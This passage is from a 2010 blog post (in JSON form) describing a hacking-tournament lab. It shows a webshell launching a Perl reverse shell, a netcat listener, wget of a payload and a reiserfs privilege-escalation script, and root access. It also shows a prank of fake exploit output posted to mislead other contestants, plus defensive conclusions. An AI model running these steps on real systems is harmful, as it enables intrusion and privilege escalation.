0.40 secs\nlocal: reis.py remote: reis.py\n200 PORT command successful.\n150 Opening BINARY mode <span style=\"color: #0000ff;\">data<\/span> connection for reis.py\n226 Transfer complete.\n1801 bytes sent in 0.37 secs\n221 Goodbye.<\/pre>\n<p>I already had planted the corelanshell.pl script on 192.168.6.70, so I issued the following command using the c99 webshell :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">perl \/var\/lock\/corelanshell.pl 192.168.6.114 4455<\/pre>\n<p>Reverse connection accepted, ready to get the 2 files and put them on the server<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# nc -lp 4455\n\n:: Depth :: Connect Back Shell ::\ncd \/apachelogs\nmkdir <span style=\"color: #0000ff;\">data<\/span>\ncd <span style=\"color: #0000ff;\">data<\/span>\nwget http:<span style=\"color: #008000;\">\/\/192.168.6.70\/corelanc0d3r<\/span>\nwget http:<span style=\"color: #008000;\">\/\/192.168.6.70\/reis.py<\/span><\/pre>\n<p>Find a good location (not mounted with noexec)...\u00a0 =&gt; \/dev\/shm<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image40.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb40.png\" alt=\"image\" width=\"373\" height=\"201\" border=\"0\" \/><\/a><\/p>\n<p>(I moved the reis.py file to that location)<\/p>\n<p>(important to note that \/apachelogs does not show up in the mount list... but I didn't try to mount it myself... perhaps I should have).<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Step 4 <\/strong>: prepare folders<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cd \/apachelogs\nmkdir .reiserfs_priv\nmkdir .reiserfs_priv\/xattrs<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Step 5 <\/strong>: 0wn<\/p>\n<p>Current situation :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">\/apachelogs\/<span style=\"color: #0000ff;\">data<\/span>\/corelanc0d3r  =&gt; compiled payload\n\/dev\/shm\/reis.py =&gt; python script<\/pre>\n<p>Launch the exploit :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 650px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cd \/dev\/shm\nls\nreis.py\n\npython .\/reis.py\nid\nuid=0(r00t) gid=0(r00t) groups=33(www-data)<\/pre>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cat \/root\/proof.txt\nsDSjnSo22bSe12sadjdjrudfknk4455qndlas4<\/pre>\n<p>&nbsp;<\/p>\n<h4>Conclusions<\/h4>\n<ul>\n<li>Using redirects and custom reponses, modifying headers etc are good. They will slow down scripts and script kiddies but won't stop seasoned hackers from discovering the real identity\/engines and\/or breaking into the system.<\/li>\n<li>Although it was somewhat hidden, the \"ghost\" machine runs some vulnerable code, giving an attacker the ability to issue commands on the system and get a shell. Don't rely on the \"need to know\" principle. Hackers will find out that you planted files somewhere and if it's vulnerable, they will use it to hack into your system.<\/li>\n<li>The web server runs with a low privilege account, but the combination of the vulnerable code, with insecure file\/folder permissions (write access + execute access) may allow for further exploitation.<\/li>\n<li>On top of that, the reiserfs implementation is buggy and can allow an attacker to escalate privileges, essentially allowing him to obtain root permissions.<\/li>\n<li>Weak firewall rules : allowing a server to access other servers (outbound connections), when that is not really necessary, may provide a hacker the ability to serve\/download malicious files.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Challenge 3 : Ghost2 (joke of the day)<\/h3>\n<p>After having finished the challenges, I decided to have some fun with the guys in the #HSIYF channel, and try to spread the rumour that I had found another (hidden) machine. I told them that this machine does not show any open ports, but it does respond to http requests on port 8080 when connected (pivoting) from 192.168.6.70\/71\/72.<\/p>\n<p>About 2 hours before the games ended, I posted the output of (an obvious fake) exploit to the channel :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">c:\\sploits&gt;perl corelan0wner_iis0day.pl 192.168.6.xx 8080\n[+] corelanc0d3r's sploit for ghost2 (hidden machine)\n[+] Creating payload... \n[+] Connecting to port 8080\n[+] Sending stage 1 (3219 bytes)...\n[+] Sending stage 2 (1211 bytes)...\n[+] Sleeping 30 seconds (<span style=\"color: #0000ff;\">wait<\/span> for hunter)\n[+] Sending stage 3 (2104 bytes, priv escalation)\n[+] ...\n[+] Telnet to port 5555\n\nMicrosoft Windows [Version 6.0.6001]\nCopyright (c) 2006 Microsoft Corporation.  All rights reserved\n\nC:\\Windows\\<span style=\"color: #0000ff;\">system<\/span>32&gt;whoami\nNT AUTHORITY\\SYSTEM<\/pre>\n<p>I'm not sure how many people fell for it and went back to the \"killthen00b\" machines, to see if there was something they could find from that machine....<\/p>\n<p>The number of PM's I reveived, following my fake message was a good indication that I managed to freak out a number of people... that was fun.\u00a0 Panic all over the place \ud83d\ude00<\/p>\n<p>So OffSec, if you noticed some high(er) traffic on killthen00b, about 2 hours before the games ended...\u00a0 Sorry for that \ud83d\ude42<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Finally :<\/h3>\n<ul>\n<li>Big high five to my friends at Corelan Team. You guys rock !<\/li>\n<li>Make no mistake - although reading this write-up probably took you max. half an hour or so, actually taking the challenge took a LOT longer (also caused by the fact that I spent about a day in the hospital).\u00a0 Anyways, I still had a lot of fun and learned a lot.<\/li>\n<li>Greetz to some of the other participants (VADiUM, smtx, raph0x88, fireking300, etc... at least you guys didn't delete my files on the server \ud83d\ude42 Respect for that )<\/li>\n<\/ul>\n<blockquote><p>By the way : smtx made a nice video about the \"ghost challenge\". You can see the video here : http:\/\/www.information-security-training.com\/videos\/smtx-ghost-challenge-video\/<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>Ranking<\/h3>\n<p>Rank before submitting the documentation :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image42.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb42.png\" alt=\"image\" width=\"221\" height=\"289\" border=\"0\" \/><\/a><\/p>\n<p>Final rank :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image43.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb43.png\" alt=\"image\" width=\"234\" height=\"234\" border=\"0\" \/><\/a><\/p>\n<p>(So I guess this documentation\/blogpost sucks).<\/p>\n<p>Oh well.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi, Over the last 2 days my friends from Corelan Team and I participated in a Hacking Tournament, organized by Offensive Security.\u00a0 The primary goals of the tournament are : be the first one to grab \"secret\" information from a machine and post it to the Tournament Control Panel. document your findings and submit them &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Offensive Security Hacking Tournament - How strong was my fu ?\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[245,127],"tags":[3735,2310,2308,2179,883,583],"class_list":["post-3767","post","type-post","status-publish","format-standard","hentry","category-exploits","category-security","tag-juniper-netscreen-screenos","tag-hacking","tag-ctf","tag-offensive-security","tag-security","tag-vpn"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"Hi, Over the last 2 days my friends from Corelan Team and I participated in a Hacking Tournament, organized by Offensive Security.\u00a0 The primary goals of the tournament are : be the first one to grab &quot;secret&quot; information from a machine and post it to the Tournament Control Panel. document your findings and submit them &hellip; Continue reading &quot;Offensive Security Hacking Tournament - How strong was my fu ?&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2010-05-10T21:20:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Offensive Security Hacking Tournament - How strong was my fu ?\",\"datePublished\":\"2010-05-10T21:20:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\"},\"wordCount\":5142,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\",\"keywords\":[\"juniper netscreen screenos\",\"hacking\",\"ctf\",\"offensive security\",\"security\",\"vpn\"],\"articleSection\":[\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\",\"name\":\"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\",\"datePublished\":\"2010-05-10T21:20:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/08\\\/corelan_ninja_thumb1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/05\\\/10\\\/offensive-security-hacking-tournament-how-strong-was-my-fu\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Offensive Security Hacking Tournament &#8211; How strong was my fu ?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","og_locale":"en_US","og_type":"article","og_title":"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"Hi, Over the last 2 days my friends from Corelan Team and I participated in a Hacking Tournament, organized by Offensive Security.\u00a0 The primary goals of the tournament are : be the first one to grab \"secret\" information from a machine and post it to the Tournament Control Panel. document your findings and submit them &hellip; Continue reading \"Offensive Security Hacking Tournament - How strong was my fu ?\"","og_url":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2010-05-10T21:20:00+00:00","og_image":[{"url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","type":"","width":"","height":""}],"author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Offensive Security Hacking Tournament - How strong was my fu ?","datePublished":"2010-05-10T21:20:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/"},"wordCount":5142,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage"},"thumbnailUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","keywords":["juniper netscreen screenos","hacking","ctf","offensive security","security","vpn"],"articleSection":["Exploits","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","url":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","name":"Offensive Security Hacking Tournament - How strong was my fu ? - Corelan | Exploit Development &amp; Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage"},"thumbnailUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","datePublished":"2010-05-10T21:20:00+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#primaryimage","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Offensive Security Hacking Tournament &#8211; How strong was my fu ?"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":62319,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3767","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=3767"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/3767\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=3767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=3767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=3767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}